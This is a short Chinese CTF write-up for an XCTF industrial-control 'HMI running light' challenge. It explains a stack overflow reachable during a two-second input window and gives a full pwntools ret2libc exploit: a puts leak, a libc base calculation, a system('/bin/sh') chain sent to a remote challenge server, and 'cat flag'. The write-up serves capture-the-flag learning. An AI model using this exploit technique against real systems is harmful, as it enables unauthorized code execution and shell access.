XCTF-HMI流水灯运行-WP

chuj

2020 年 12 月 30 日

462 次浏览

暂无评论

2592字数

CTF-WP

<p>这道题目挺有点意思，也让我知道了工控安全在ctf是怎么体现的。</p>

<p>其实很简单</p>

<p>就是这样的一个栈溢出而已，几乎没有保护，我们可以为所欲为。但是需要特殊处理，程序一直在跑流水灯</p>

<p>当i==2，k==2的时候会退出，设置了一个信号，有两秒钟的短暂输入时间，我们在这个时候输入rop链就可以get shell了。不过整个过程只有两秒钟，很快就会重新被流水灯刷屏，所以不得不通过脚本直接帮我们cat flag。</p>

<p>输入的时机很好判断，可以输入前会puts一个换行，也就是说会直接接受到两个换行，这个时候输入就可以了。</p>

<pre class="wp-block-code"><code>#!/usr/bin/env python                                                     
# coding=utf-8                                                            
from pwn import *                                                         
#context(log_level = 'debug')                                             
                                                                          
sh = remote("220.249.52.134","40989")                                     
#sh = process("./format")                                                 
elf = ELF("./format")                                                     
libc = ELF("./libc_32.so.6")                                              
                                                                          
payload  = 'a' * 0x88 + 'b' * 4                                           
payload += p32(elf.plt["puts"])                                           
payload += p32(0x8048888) #ret2gee                                        
payload += p32(elf.got["puts"])                                           
                                                                          
sh.recvuntil('\n\n')                                                      
sh.sendline(payload)                                                      
                                                                          
puts_addr = u32(sh.recv(4))                                               
system_addr = puts_addr - libc.symbols["puts"] + libc.symbols["system"]   
bin_sh = puts_addr - libc.symbols["puts"] + libc.search('/bin/sh').next()   
                                                                          
payload  = 'a' * 0x88 + 'b' * 4 + p32(system_addr) + 'ret2' + p32(bin_sh)   
                                                                          
sh.sendline(payload)                                                      
sh.sendline("cat flag")                                                   
print sh.recvuntil('}\n')                                                   
                                                                          
sh.interactive()                                                            </code></pre>

<p>不知道为什么，最后的recvuntil必须接收的是'}\n'，接受'}'是不行的</p>

最后修改：2020 年 12 月 30 日